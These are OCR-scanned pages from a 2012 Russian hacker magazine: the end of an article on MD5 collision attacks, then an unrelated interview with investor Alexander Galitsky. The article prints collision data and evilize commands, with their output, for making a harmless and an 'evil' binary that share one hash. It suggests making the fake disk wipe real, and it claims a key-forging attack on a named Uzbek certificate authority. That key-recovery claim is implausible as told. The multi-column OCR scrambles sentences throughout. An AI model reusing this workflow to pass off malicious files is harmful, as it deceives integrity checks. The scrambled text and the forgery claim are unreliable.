ты уже понял, о чем идет речь. Поддельные сертификаты в 15 байт! Таким образом, файлы получались разные по размеру, Марка Стивенса
были сгенерированы при помощи фундаментального бага — но одинаковые по контрольной сумме. История с украденными о коллизиях:
коллизий. Антивирусы, проверяя контрольную сумму файлов, сертификатами осталась бы практически незамеченной, если бы bit.ly/ztdpHg.
не заметили никакого подвоха, а ведь все держалось именно не работа независимых ИБ-исследователей.

ХАКЕР 04 /159/ 2012 021

COVERSTORY

Практика
ОТ ТЕОРИИ К ПРАКТИКЕ
Ну что же, теперь перейдем к долгожданной практике. Среди
профессиональных криптоаналитиков есть вполне определенная
классификация типов устойчивости алгоритмов хэширования, их
всего три.
1. CR2-KK — свободный от коллизий, устойчивый к коллизиям.
2. CR1-KK — универсальный односторонний.
3. CR0 — универсальный.

Также существуют три вида соответствующих атак для нахождения

коллизий:
1. CR2-KK — найти коллизии для конкретной функции.
2. CR1-KK — подобрать к заданному значению пару, образующую
коллизию для конкретной функции.
3. СК0 — найти коллизию для семейства функций.
Оригинальный сертификат
Сегодня я продемонстрирую тебе два первых вида атак на
практике. Для начала приведу два блока данных в HEX (пара
коллизий из научной работы китайского ИБ-исследователя Ван зовать пример hello-erase.c, идущий в комплекте с исходниками.
Сяоюня), их нужно вбить в hex-редакторе и сохранить в виде двух Итак, компилируем нашу программу и линкуем ее с объектным
файлов: файлом goodevil.o:

1-й файл gcc hello-erase.c goodevil.o -o hello-erase

d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f89
55ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5b Смотрим контрольную сумму подопытного файла:
d8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0
e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70 md5sum ./hello-erase
23d3e4873e3ea619c7bdd6fa2d0271e7
2-й файл /home/satsura/md5coll/source/evilize/hello-erase
d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f89
55ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5b Разбиваем на блоки нашу полученную контрольную сумму, и за-
d8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0 пускаем на исполнение генератор MD5-коллизий:
e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70
./md5coll 0x23d3e487 0x3e3ea619 0xc7bdd6fa 0x2d0271e7 > \
Если сравнить размер и контрольную сумму в MD5 у получен- init.txt
ных файлов, то мы не заметим никакой разницы! Теперь давай
найдем еще несколько коллизий к этим файлам. Программа MD5 Далее запускаем evilize для создания двух различных испол-
Collision Generator от Патрика Стэча поможет нам разобраться няемых файлов с одинаковым размером и MD5-хэшем. Смотрим
в атаке CR2-KK. Смело компилируй ее и запускай на исполне- на контрольную сумму и размер, а затем запускаем полученные
ние. Первая коллизия на моем самом слабом компьютере была бинарники:
получена менее чем за 15 минут, а вторая — примерно через два
с половиной часа! Не так уж и плохо, согласись. ./evilize hello-erase -c init.txt -g good -e evil
Теперь перейдем к реальной атаке, для этого будем исполь- du -sh ./evil ./good & md5sum ./evil ./good
зовать эксплойт-библиотеку evilize (снова обрати внимание на 8,0K ./evil
ссылки). После компиляции данной библиотеки в текущей дирек- 8,0K ./good
тории должны появиться три файла: evilize, md5coll и объектный d8bf211b61624d331fe06c75bd6e3c89 ./evil
файл goodevil.o. В качестве подопытной программы будем исполь- d8bf211b61624d331fe06c75bd6e3c89 ./good

НЕМНОГО ИСТОРИИ

Ганс Доббертин нашел псев- Китайские исследователи Ван Те же самые Ван Сяоюнь и Юй
1996 доколлизии в MD5, используя
определенные инициализи-
2004 Сяоюнь (Wang Xiaoyun), Фен Дэн-
гуо (Feng Dengguo), Лай Сюэцзя
2005 Хунбо опубликовали алго-
ритм, позволяющий найти две
рующие векторы, отличные от стандартных. (Lai Xuejia) и Юй Хунбо (Yu Hongbo) объявили об различные последовательности в 128 байт,
обнаруженной ими уязвимости в алгоритме, по- которые дают одинаковый MD5-хэш.
зволяющей находить коллизии за крайне малое
время (1 час на кластере IBM p690).

022 ХАКЕР 04 /159/ 2012

 Опасный двойник

./good
Hello, world!

./ evil
This program is evil!!!
Erasing hard drive...1Gb...2Gb... just kidding!
Nothing was erased.

Как видишь, одна программа выводит известную всем безо-

бидную фразу «Hello, world!», а вторая якобы стирает данные на
диске. Мы можем переделать наш hello-erase.c так, чтобы вместо
шуточного стирания данных произошло реальное, и тогда будет
Коллизия в действии
не до шуток. Но все это цветочки по сравнению со следующей
атакой, которую я провел при своих исследованиях CR1-KK.
образующей коллизию для конкретной функции при генерации
ВЗЛОМ CR1-KK электронно-цифровых ключей. Изначально было несколько
В качестве «жертвы» для исследований я выбрал цифровые данных, которые я и использовал в качестве входных параме-
ключи компании Unicon, являющейся в Узбекистане монополи- тров. Очень облегчил задачу тот факт, что пароль для закры-
стом в области ЭЦП (электронно-цифровой подписи) и серти- той ЭЦП у всех сертификатов один и тот же: 000000. Это была
фикации. Основываясь на трудах Властимила Климы, я написал фатальная ошибка — самая грубая из встреченных мной за весь
программу CR1-KK-collision keygen для подбора пары к значению, опыт работы в области ИБ. Имея на руках только контрольные
суммы файлов и открытые ключи, мне удалось сгенерировать
примерный оригинальный закрытый ключ для подписи раз-
личного рода документов, ключей и идентификации пользова-
теля в нескольких CRM-системах (к примеру, E-hujjat от того же
монополиста). Проделанную работу ты сможешь увидеть воочию
на соответствующих скриншотах, в консоли же все это выгляде-
ло примерно так:

C:\coll_test> md5sum *
b2d1a3f63f9784e0fe8c237ff2484a78 *key((faked by collision).
key
a654bd700b5e6cf47ca0b042b2f30575 *cer(faked by collision).cer
c5d6aaa28639316614e3d95987fcb612 *pfx(faked by collision).pfx
a654bd700b5e6cf47ca0b042b2f30575 *cer.cer

Как видишь, у сертификатов cer.cer и cer(faked by collision).cer

одинаковая контрольная сумма.

ЗАКЛЮЧЕНИЕ
Надо признать, что MD5-хэши стали неотъемлемой частью на-
шей жизни. Они вездесущи. Их используют в качестве алгорит-
мов для хэширования паролей как в программном обеспечении,
так и на веб-ресурсах. Они не зависят ни от платформы, ни от ОС,
на которых исполняются. Векторы атак также довольно широки:
от банкоматов до цифровых подписей, от авторизации клиент-
сервер и до целостности передаваемых по сети файлов. Являясь
быстрыми и менее криптостойкими, 128-битные алгоритмы
хэширования принесут еще немало бед. На сегодняшний день
коллизии и псевдоколлизии были найдены в большом ряде алго-
ритмов, среди которых MD2, MD4, MD5, DES, DES-IDEA, RIPE-
MD, HAVAL(~128, ~256), SHA-1, ГОСТ Р 34.10-2001 и так далее. Со
Генерируем коллизии временем этот список будет только пополняться. z

Чешский исследователь Эдуардо Диаз по специально Дидье Стивенс использовал

2006 Властимил Клима опубли-
ковал алгоритм, дающий
2007 разработанной схеме создал
два различных архива с двумя
2009 библиотеку evilize для соз-
дания двух разных программ
возможность находить коллизии на обычном разными программами, но абсолютно иден- с одинаковым кодом цифровой сигнатуры
компьютере с любым начальным вектором тичными MD5-хэшами. (Authenticode digital signature), authenticode
(A,B,C,D) при помощи метода, названного им используется Microsoft для подписи своих
«туннелирование». библиотек и исполняемых файлов.

ХАКЕР 04 /159/ 2012 023

COVER STORY

Наш гость – удивительный человек. Он начинал свой путь

как инженер и разрабатывал архитектуру компьютеров для
спутников слежения. Его команда создала первые рабочие зовать, и ты за нее борешься. Так и закалялся
образцы Wi-Fi и раньше всех представила программную характер, в таких вот сражениях-боях.

реализацию VPN для Windows. Запустив несколько СОТРУДНИЧЕСТВО С SUN

технологических компаний, Александр Галицкий основал Моя первая встреча с основателями Sun
Microsystems состоялась в 1990 году. К нам
венчурный фонд Almaz Capital Partners, который хорошо в страну впервые приехали люди, с кото-
известен не только в России, но и в Силиконовой долине. рыми мы имели право встречаться. Правда,
только через совместное предприятие — они
создавались специально и контролировались,
дабы мы могли общаться, но были скрыты.
Тогда к нам приезжал Билл Джой и еще один
НАЧАЛО КАРЬЕРЫ технической мощи была сильно развита. И это активный человек — Джон Гейдж, который
Мой путь начинался в Советское время. Все воспитывало в нас такую... систему сраже- в то время был их директором по науке.
мальчишки с периферии мечтали пробиваться ния. Поэтому я рос в этой системе достаточно Мы с Биллом Джоем одного возраста, и у
через технические направления. Я хотел про- быстро. нас во время разговора пошло нечто вроде
биваться через космос. Мне повезло — я попал Помню, шеф вызвал меня, и мы долго противостояния. Я начал излагать какие-то
на работу к человеку, который был генераль- обсуждали архитектуру нового компьюте- вещи — они стали удивляться. Ведь их кто-то
ным конструктором систем спутниковой раз- ра — как он должен строиться. Я исходил из заманил в Советский Союз, дикую в их глазах
ведки и наблюдения. программистских начал — меня не устраивали страну. В ходе этих дебатов я все время на-
Из фривольной научной работы я сразу существующие системы программирования: ходил какие-то аргументы. В определенный
окунулся в тяжелые бессонные ночи про- мы не могли легко менять код на ходу. То есть, момент нашего спора я полез в карман и до-
граммистов, вкалывающих, чтобы запустить технически — могли: спутники управлялись стал оттуда 22-слойную полиамидную плату,
первый спутник наблюдения с цифровым изо- с Земли, и мы, естественно, корректировали что ввергло их в полный осадок. В то время
бражением. До этого все спутники еще делали код со станции управления, софт помогал в Америке их делали где-то в 8 слоев, и у них
с отстреливающимися кассетами на фотоаппа- исправлять много допущенных аппаратных она не получалась, — а тут целых 22 слоя!
ратах. Мы делали первый спутник с системой ошибок. Но все это требовало очень больших Наша компания тогда отличалась тем,
запоминания и передачей данных через гео- усилий, титанических бессонных ночей. И, ко- что мы сидели на стыке микроэлектроники
стационарные спутники. Я оказался в команде, нечно, мы все время пытались это совершен- и космической аппаратуры. Была придумана
когда все железо уже сделали, а софт, как это ствовать. Когда началась разработка новой схема: чтобы решать проблемы габаритов,
часто тогда бывало, не работал. архитектуры, со стороны софта уже пошел мы делали бескорпусную аппаратуру. То есть,
Мой шеф — Геннадий Яковлевич Гусь- перелом — мы влияли на аппаратуру, и нас корпуса снимались, и только чипы ставились
ков — был настоящим предпринимателем. стали больше слушать. По сути дела, началась на плату. Тогда весь мир начал смотреть в эту
Он обладал теми качествами, которыми от- конкуренция за создание новой архитектуры. сторону, и позже даже Sun выпустил некий
личались, например, Стив Джобс или Королев. Мой босс сказал, что если я хочу сделать компьютер, где SPARC-процессор был именно
В нем было много авантюризма, техническое свою архитектуру, у меня есть две недели бескорпусный.
видение и тонна идей. Например, очень пока- на формирование подразделения. До этого Естественно, это произвело на Sun какое-
зательный момент: в Россию приезжал Никсон у меня, конечно, была куча софтовых инжене- то невероятное впечатление. Была осень 1990
и встречался с Брежневым. Он привез с собой ров, но тут — пожалуйста: бери разработчиков года, когда они приехали к нам в Зеленоград
несколько чемоданов, развернул их, достал чипов, бери разработчиков, которые будут на суперзакрытое предприятие. Там мы снова
оттуда телефон и начал связываться со своими платы разводить и воплощать архитектуру много говорили, показали им еще что-то...
посольствами в разных странах. Это, конечно, в «железо». Соответственно, можно было по- У них загорелись глаза, появились мечты —
произвело дикое впечатление. Был 1972 год! высить ставки сотрудников в среднем на 10% – у Sun вообще амбиций много. Мол, как насчет
И Брежнев, естественно, заявил, что к поездке это был достаточный бюджет, чтобы я мог их закинуть SPARC в космос? Для них же это
в Америку он хочет иметь такую же систему. переманить. Нельзя ведь нанять толпу народа понты — SPARC в космосе, это же круто! Intel
Все ответили, что это невозможно, и только с улицы: они не прошли бы проверку по спец- в космосе, и SPARC тоже в космосе. А Билл
мой босс сказал: «Я это сделаю». И сделал. службам, а нужно было много людей. И вот я Джой, как и все: в джинсах, в кроссовках.
К отъезду Брежнева в Штаты все было обеспе- начал ходить внутри и сманивать специали- Ходит, танцует, выпендривается. Шеф говорит
чено: специальный десант высадился на Кубе стов на новую перспективную работу, тем са- мне: «Что за ненормальный такой?» :).
для развертывания систем резервирования мым наживая себе кучу врагов: меня обзывали В 1991 году мы впервые поехали в США,
и управления спутником... Но, тем не менее, «карьеристом», негодяем, человеком, идущим где проходил первый Советско-американский
Брежнев смог достать свой чемодан, снять по трупам... В общем, я выслушал о себе космический конгресс. С этим связано немало
трубку и продемонстрировать, что «мы ничем кучу нелестных вещей. Тем не менее, в таких смешных историй. Например, мы вывезли
не хуже, чем они». обстоятельствах понимаешь — у тебя есть две туда очень много разного железа, включая
Просто бешеное количество денег и сил недели, тебе нужно сформировать подразде- наш ядерный двигатель для космоса, луноход,
тратилось тогда на все эти разработки. Воз- ление. У тебя есть светлая идея что-то реали- нашу ранцевую аппаратуру связи с плоскими
можно, это было не совсем правильно с точки
зрения экономики и прочего, но, тем не менее,
эта часть достижений и доказательств нашей

024 ХАКЕР 04 /159/ 2012

 Интервью с венчурным инвестором

ИНТЕРВЬЮ С ВЕНЧУРНЫМ ИНВЕСТОРОМ

ГЛАЗ-
АЛМАЗ АЛЕКСАНДР
ГАЛИЦКИЙ

ФАКТЫ
ических наук
Кандид ат техн
более
и обладатель
Изобретатель тентов
30 па
да успешных
Основатель ря х компаний
ки
технологичес
Almaz
урного фонд а
Созд атель венч s, в портфель кото-
Ca pit al Pa rtn er кс,
ании как Янде
рого такие комп war, Alter Geo
Paralle ls, Ala

рными лыжами
Ув лекается го гом
и виндсерфин
колково»
Член Совета «С

ХАКЕР 04 /159/ 2012 025

COVER STORY
развит как сейчас. Ты не можешь пригото-
вить что-то вкусное, если не был на кухне:
ты должен видеть, что делает повар. Я тогда
антеннами, которую использовали наши служ- В 1993 году мы впервые продемонстриро- проводил много времени в Кремниевой
бы. И это все запретили вывозить обратно :). вали работу PCMCIA-карточек Wi-Fi, работаю- долине и был такой абсолютно уникальный
Потому что по какому-то там закону — ввозить щих на скорости 4 Мбит/c. Это было на выстав- для них человек, поэтому меня таскали на
можно, а вывозить нельзя. ке Interop в Париже. разные совещения (наверное, с мыслью, что
Тогда Sun’овцы пригласили меня приехать Wi-Fi в то время был нафиг никому не я скажу что-нибудь умное). И Скотт Макнили,
к ним в Калифорнию. В то время нас обхажи- нужен! Ни в России, ни на Западе. Для Sun и Энди Бэчтольшайм, и Билл Джой, и Эрик
вали все — IBM, HP... Но все они были такие это было непрофильное направление, поэтому Шмидт. Когда я был в фирме, они все время
очень формальные: в галстуках, костюмах, вместе с ними мы поехали к Ericsson, самой демократично приходили на обед со всеми
вели сложные разговоры. И помню, я приле- революционной компании в данной сфере на сотрудниками, но садились за отдельный стол
тел в Sun, встретился там со своим нынешним тот момент. Ericsson активно продавала HP LX и туда приглашали людей, с которыми хотели
партнером Джеффом Байером. Он сидел такой со своим радиомодемом— первый «носиль- беседовать. Меня звали всегда.
в джинсах, в каких-то тапочках на босу ногу, ный» компьютер, раскладушечка такая. Ее все Я просто слушал чужие беседы. Исходя из
все так расслабленно... И я подумал: «Вот, начали усиленно покупать. Было видно — чело- этих бесед, я выносил сведения о каких-то ды-
это правильные пацаны, с которыми надо век машину останавливает, антенну открывает, рах, которые тогда существовали. Одна из дыр,
работать! Что там какие-то IBM и HP». Так и за- бах-бах-бах, и почту получил. Скорости 19.2 которую я подметил, — это реализация VPN,
вязалась дружба. кбит/с было более чем достаточно. Приложений который нужен был для интернета, потому как
В один момент Sun прислала нам 15 к письмам тогда не было — почта была чисто не было защищенных каналов. Тогда я осо-
компьютеров, стоимостью каждый по 25 текстовая. Поэтому нам ответили: «Куда нам знал, что Sun нифига не понимает в Windows
000 долларов. Ну что с ними делать? Надо такие скорости? Нет рыночной потребности». и сказал: «Все, парни, делаем все в Windows!».
работать. Я пошел сдавать их на госкомпанию. «Какие же мы были тогда чудаки!», — го- И мы взломали эти NDIS-драйверы, которые
Но госслужба по советскому закону не могла ворил мне CEO Ericsson, когда мы встречались Microsoft не публиковала. Выполнили реверс-
взять от частного лица подарок на такую с ним в 2003-2004 году. инжиниринг, на который американцы либо
сумму, а таможня тогда с частных лиц денег Sun нас использовала чисто для своих неспособны, либо не делали его по этиче-
не брала. И один мой товарищ сказал: «Что нужд. Им было интересно кидать нам какие-то ским соображениям, и разработали VPN. Так
ты мучаешься, ну не берут их у тебя — открой нерешаемые задачи, и мы пытались их решить. появился Sun Screen E+ и позже — российская
компанию». А открыть компанию занимало два В Solaris мы выгребали баги, к нему же писали «Застава».
дня... Мы пошли и открыли. Так и образовалась модули. Было очень много проектов в сотруд-
моя первая компания. ничестве с Эриком Шмидтом, который тогда СОЗДАНИЕ ВЕНЧУРНОГО ФОНДА
был президентом софтового подразделения, Я начал вкладывать в интересные проекты
О СОЗДАНИИ WI-FI а затем СТО компании. Я подбирал заказы, свои личные деньги. Но потом решил — нет,
К концу 80-х мы начали вести испытания IP- смотрел, что там неправильно, мы лепили про- что-то неправильно, нужно что-то менять,
протокола через наши системы передачи дан- дукты и продавали их за большие деньги. нужно решать это более комплексно. Нужно
ных. Я был апологетом Unix-систем и считал, сделать фонд, который будет решать эту про-
что IP-протокол позволяет нам делать очень О ПРЕДПРИНИМАТЕЛЬСТВЕ блему в более масштабном виде. Так я начал
много независимых вещей. Это, в отличие от Вся история 90-х строится на том, что мы двигаться к своему фонду.
PDP’шных или DEC’овских, открытые про- были воспитаны на инженерной науке, на Меня начало увлекать, что есть много
токолы, соответственно, с их помощью можно создании этих, в каком-то смысле единичных, интересных компаний, у которых нет знаний,
много чего организовать в сетях. Нам нужно образцов, чтобы удивить мир. Чтобы показать, а я мог бы с ними поделиться, потом вложить
было передавать для «звездных войн» целую что «мы не хуже». Коммерческая составляю- куда-то деньги.
кучу потоковой информации, сливать с разных щая ни у кого не сидела в голове — было жела- Я очень люблю молодых предпринима-
маленьких спутников. Это можно было делать ние сделать и удивить. телей, которые говорят совершенно новые
единственно таким вот образом. Новорожден- Когда мы делали первый VPN, интернета и порой непонятные вещи... Но главное, чтобы
ной России все это уже было не нужно. еще толком не было, браузер появился позже. они говорили на понятном языке…
Мы к этому времени уже начали сотрудни- Сервер, установленный в нашей компании Все суперкомпании создавались людь-
чать с Sun. И вот они присылают нам спец- «Элвис+», был в первой полусотне (если не ми в возрасте от 20 до 30 лет. Но если брать
ификацию и говорят: «Есть протокол 802.11, в числе первых нескольких десятков) веб- статистику потерянных компаний и компаний,
который сейчас находится в разработке, а вы серверов в мире. В этой эйфории мы ползли которые выстрелили для венчурного капи-
можете сварганить PCMCIA-карточку?». Ну, я за Sun’ом, который «присылал нам девять тонн талиста, то, напротив, получается, что нужно
и собрал команду... оборудования». Мы начали строить мейл- вкладывать в людей, которым уже 40-50 лет
Сам протокол 802.11 мы, конечно, не изо- серверы — это направление потом выродилось :). У них есть опыт и они, по крайней мере,
брели. Этим занимается Internet Engineering в компанию «Элвис Телеком». К примеру, доводят до логического конца то, что созда-
Task Force. Мы, конечно, писали какие-то мы делали факс-серверы – у Microsoft такой ют. И пусть на них не заработать 1000%, как
дополнения. Считать нас родителями Wi-Fi не- появился только где-то в конце 90-х годов. на Google или на чем-то там, но ты получишь
правильно, но первые рабочие образы сделали Мы пионерили во многих этих вещах. 5-, 10-кратный возврат инвестиций.
мы. В общем, были пионерами. И сейчас вспоминаешь и думаешь: «Вот ты хо- Должен быть баланс между риском
Мы побили Motorola, военных, и много дил по таким кладезям идей, и если бы кто-то вложения денег в очень молодые головы и в
кого еще. Была интрига: ведь Sun раздал мог правильно вложить бизнес-науку...». Было состоявшихся предпринимателей (так назы-
конкурентные предложения нескольким фир- множество инноваций, но мы не знали, как ими ваемых repeated entrepreneurs), которые либо
мам. И вот мы, какие-то непонятные русские, распоряжаться. Для меня бизнес тогда был имели неуспешный бизнес и пытаются вести
привозим работающий образец. Все в шоке простой: что-то сделать, продать, заработать успешный, либо уже сделали успешный и те-
и в трансе. Sun принимает решение, что в нас деньги. перь хотят создать еще лучше. У последних,
надо инвестировать. Для них это была во- У нас было много собственных идей,
обще первая в истории компании инвестиция но для нас было важно знать, «что проис-
в кого-либо. ходит на кухне». Интернет не был сильно

026 ХАКЕР 04 /159/ 2012

 Интервью с венчурным инвестором

по меньшей мере, есть жила преодолеть все и там уже существуют двадцать компаний по- ная, способная и самокритичная команда.
болевые точки, удары, и они дойдут до конца, добного рода... Было бы странно поверить, что А если они на что-то не способны, то должны
они все это уже проходили. А молодой человек все будет хорошо. Особенно когда антрепренер четко открыться и сказать: у нас нет пони-
даже с суперсветлой идеей может сломаться, впервые делает компанию, имеет только идею, мания в такой-то области, или, например,
или его вообще понесет в десяток других идей, и даже прототипа как такового у него еще нет... нет в команде человека, который понимает
поэтому есть неуверенность в этом деле. Увы, это не наша стадия. маркетинг. Должны признавать: да, у нас есть
В фонде Almaz 2 мы планируем вложиться хороший человек, но мы хотели бы другого, вот
где-то в сорок компаний очень ранней стадии, КАК ПРИХОДИТЬ К ИНВЕСТОРУ? с такими-то параметрами.
когда они еще требуют небольших денег. Есть такая проблема, что люди пытаются Важно, чтобы люди понимали, в какой
Но мы будем это делать вместе с акселерато- прийти прямо ко мне. Но лучше, когда они по- рынок они играют. Нужно понимать свое место
рами, либо с какими-то инкубаторами. Кто-то падают в систему и наш процесс. Когда пишут в рынке, кто ваш реальный конкурент. Когда
другой будет «нянчить» всех этих людей, напрямую мне, я могу что-то случайно про- пишут в конкурентах Google... Ну, он у всех кон-
которые будут звонить по ночам и задавать пустить, не прочитать — сыпется очень много. курент, даже у Microsoft и IBM. Сегодня вообще
вопросы. Нас не хватит на них. Но мы сможем Начинаются обиды. Предприниматель же счи- есть всего четыре компании, которые движут
подобрать их на следующей стадии, когда они тает, что то, что у него сделано — это лучше миропонимание: Apple, Google, Facebook
уже немного оперятся и смогут двинуться на всего и неповторимо, и в мире такого больше и Amazon. Все остальные пытаются под-
следующий этап. нет. А если я не уделяю этому внимания, значит строиться, в том числе и Microsoft. Пытаются
Наш фонд старается не участвовать в опе- я идиот, или зажравшийся... человек. найти, как и где сконкурировать с этой новой
ративном управлении компаний, в которые Правильно прийти к венчурному инвесто- волной и остаться на вершине.
инвестировали. Да, приходится влиять на ру — это сначала сходить на его сайт и посмо- Народ ленится посмотреть, что, вообще-
него. Иногда. Но забирать эту пальму пер- треть, что именно он хочет, что рассчитывает то, в области есть куча проинвестированных
венства у антрепренера — самоубийство, увидеть. Как правило, мы публикуем такие компаний, у которых есть деньги. И нужно
и мы стараемся этого никогда не делать. требования. сравниться с ними с точки зрения своих ре-
сурсов, людей. Понять, как выиграть у них эту
игру. Понять, как двигаться дальше, как будут
использоваться деньги, зачем вообще нужны
деньги.
СЧИТАТЬ НАС Важно понимать: венчурный фонд — это
сервисная компания. Это не есть компания,
РОДИТЕЛЯМИ WI-FI которая ведет тебя к успеху. Это всего-навсего
сервисная компания, которая помогает тебе
НЕПРАВИЛЬНО, туда прийти. Поэтому инициатива всегда
должна находиться в руках CEO, предпринима-
НО ПЕРВЫЕ РАБОЧИЕ теля (или антрепренера, как мы чаще говорим)
и так далее.
ОБРАЗЦЫ СДЕЛАЛИ Компания для предпринимателя — ребе-
нок. Сам он — неумелый родитель. А мы —
ИМЕННО МЫ. эдакие опытные няни. С этой точки зрения,
если мы будем навязывать ему, что делать, это
будет неправильно. Он должен обращаться
В некоторые ниши мы не вкладываем- Во всем венчурном мире ты лучше работа- к нам и говорить: «Вот у меня ребенок захны-
ся. Например, в e-commerce, где логистика ешь с проектами, которые приходят по какой- кал, что делать? Какие бывают варианты, что
серьезная завязана — это требует очень то рекомендации, от человека, которому ты мне нужно сделать, чтобы он успокоился? Или
много денег. Мы все-таки небольшие фонды, доверяешь. Когда тебе говорят: «Саш, посмо- «Вот он хочет заниматься какими-то другими
и рассчитываем вложить (в «Алмазе», по три, вроде бы интересно», то в первую очередь игрушками, делать что-то другое. Что в таком
крайней мере) за время жизни семь, макси- ты, конечно, смотришь на эти проекты. случае предпринять? Дать ему возможность
мум пятнадцать миллионов в команду. Этого Я не люблю бизнес-планов. Их никто заниматься другими игрушками?». Вот здесь
явно мало для построения такого бизнеса как не любит. Это в каком-то смысле устарев- венчурный капиталист очень полезен: он мо-
e-commerce и уверенности, что эта компания ший формат. Нет, конечно, бизнес-план был жет прийти, помочь и многое сделать.
взлетит и куда-то двинется. нужен когда-то, когда не было возможности Часто венчурные капиталисты выступают
Нам ближе софтверные компании. У них запомнить и проверить все, что тебе говори- в роли такого HR или хэдхантера, помогают
большие риски, но они измеримы в реальных ли. Сейчас все это можно в два счета сделать выстроить команду, заменить, подрастить
деньгах, которые мы можем дать. Даже если в презентации на пятнадцать слайдов и все ее. Но все антрепренеры разные. Бывают
компании требуется больше чем пятнадцать факты прикрыть линками на отчеты, справки, и такие, кто считает, что раз их компания
миллионов, с каким-то партнером ты можешь аналитику и так далее. Хорошо, когда прихо- растет, приносит прибыль (хоть маленькую),
это сделать. дит презентация и к ней существуют сопут- значит, все — они герои, они уже могут жить не
У нас есть четкое требование: мы хотим ствующие материалы: ты можешь почитать, по средствам.
видеть, что это миллиардный рынок. При- проанализировать и сказать: «да, вот анализ
чина проста: мы должны быть уверены, что по конкуренции сделан правильно» или ПРО МОЛОДЫЕ ПРОЕКТЫ
у компании есть возможность маневрировать. «анализ рынка и позиционирования сделан Еще несколько лет назад мы смеялись над
Если компания врывается на только откры- неверно». тем, что есть такие чемпионы всех конкурсов,
вающийся рынок (даже если этот рынок очень Очень важно, когда человек хорошо пред- которые с одним и тем же проектом ходят
интересен в перспективе, но его размер со- ставляет, что он умеет и что нет. Ведь важнее по всем тусовкам и везде его продвигают. Их
ставляет всего порядка двадцати миллионов), всего понять, что к тебе пришла правиль- было считанное количество. На сегодняшний

ХАКЕР 04 /159/ 2012 027

COVER STORY
который занимается направлением Software-
Defined Networking. Ведь проблема номер
один больших компаний и телекома — уде-
день я бы так не сказал. Существует достаточ- определенного размера и дальше роста у них шевить все затраты на сети и ЦОДы за счет
но много интересных проектов, интересных нет. Они не могут вырваться из этой ниши, пото- виртуализации слоя сети. Это большое
уже с точки зрения совершенства представ- му что у них нет базы знаний, они не знают, что направление, модное и популярное. Я с трудом
ления. дальше существует в индустрии, что они могли затаскиваю его в Сколково, чтобы построить
Есть проблема — многие идеи мелкие. Они бы решать. И это только одна из проблем. исследования совместно со Стэнфордом. Но я
нишевые и нацелены только на Россию. Люди Когда IT-предприниматели быстро до- рассчитываю, что из этого проекта может
не осознают рынка глобального. А на россий- биваются очень больших успехов, а потом появиться новая плеяда мыслящих ученых,
ском рынке только складывается культура начинают просаживаться. Это другая про- могут родиться прорывные компании.
покупки компаний. Я всегда привожу в пример блема. Причина одна — они зарабатывают У нас не формируется база знаний. Скол-
Google. Статистику за 2009 или 2010 год, когда много денег сами, владеют практически ково должно сыграть большую роль именно
они купили 42 компании. Из них только две всей компанией и зарабатывают от 1 до 10 в накоплении и формировании базы знаний
были объемом 400 миллионов и миллиард. миллионов долларов в год. Им ничего не в индустрии. Быть может, даже большую, чем
Все остальные сорок были... ну, средний чек надо – у них жизнь удалась. Амбиций роста оно играет сейчас. В старые времена были
составлял 25 миллионов. Значит, кого-то они в следующий этап у них нет. Им сложно — они отраслевые НИИ, сейчас их нет. То есть, где
купили за пятьдесят, кого-то — за один. Услов- хотят, но, с другой стороны, им придется рас- должна база знаний формироваться — непо-
но. Или за 10-30. В России чек будет ниже в 2-3 ставаться с этим полным владением того, что нятно. У нас есть неплохие сетевые инженеры,
раза. Условно, средний чек сделки в России они делают. Есть, к примеру, такая компания есть неплохие институты, которые готовят
должен составлять 25 миллионов поделить JetBrains из Питера, вот она запросто может неплохих сетевых инженеров, просто они
на 3, ну пусть это будет 8-10 миллионов. Сред- стать миллиардной компанией. Но их, видимо, не имеют индустриального понимания, куда им
ний чек 10 миллионов, но если я хочу иметь удовлетворяют те 40-60 миллионов долларов дернуться и двинуться. Если же создать базу
соответствующий возврат, я должен вложить оборота, с которыми они работают. И владель- знаний, они будут видеть: вот оно — лежит.
более 30% компании. Я должен вложить тысяч цы как бы игнорируют всех, им не интересны Скажем, к примеру, если я напишу некий
300 и получить обратно свои 3 миллиона, вот деньги никаких венчурных капиталистов. софт, чтобы роутер быстрее работал (именно
это будет нормально. Но за 300 тысяч, вроде Но приятная штука в том, что в России таких софтовый роутер), то вот — я могу создать
бы, и компанию не построишь. Или надо на- компаний довольно много. и компанию на основании моих исследований.
строить такие компании, которые бы уклады- Вот такие я вижу возможности.
вались в эту экономику. Это та часть осозна- СКОЛКОВО Сколково должно быть исключением из
ния, которая еще приходит. И формируется Если я увижу в Сколково «распил бабла», я правил. Сейчас же там для компаний, которые
венчурный рынок. Но количество компаний сразу напишу заявление об уходе. Думаю, так получают гранты, устанавливают правила:
выросло, хотя есть вот такие проблемы. поступят и другие люди из совета директоров. например, средняя зарплата должна быть
Проектов «go global», которые могут Эрик Шмидт, любые другие иностранцы... Если только такая-то. Или говорят, что нельзя пере-
удивить мир (новые Parallels, Касперские, они это увидят, они уйдут. Может ли в Сколково распределять бюджеты. Но ведь бывает и так,
Акронисы) не много. Я всегда объясняю, что появиться «распил»? В строительстве, в схе- что компания очень динамичная. Может быть,
причина в том, что, во-первых, у нас нет таких мах строительства, наверное, что-то может компания заявила, что бюджет надо было
индустриальных лидеров, чтобы вот эти «темы» произойти. Но чтобы он появился именно потратить на маркетинг, но теперь его нужно
можно было ловить и понимать, где существуют в области фондирования компаний... вряд ли. потратить на покупку пяти дополнительных
«дырки», которые можно залатать. Во-вторых, По крайне мере, там явно сегодня не нужно да- компьютеров. А им говорят — нет, нельзя, надо
у нас нет исследований. В старые времена вать никому никаких откатов, чтобы получить тратить на маркетинг! Вот эта совковость, ко-
были отраслевые НИИ, сейчас их нет или гранты или статус участника. Все это делается торая сидит в Счетной палате, в Минфине, она
совсем мало. То есть, непонятно, где должна очень по-честному. и заставляет Сколково жить по правилам, и это
формироваться база знаний. Поэтому компа- Грустно, но хорошие компании не хотят может погубить Сколково.
нии в основном создаются людьми, которые брать гранты в Сколково — с ними куча возни. Сколково нужны такие эксперты-
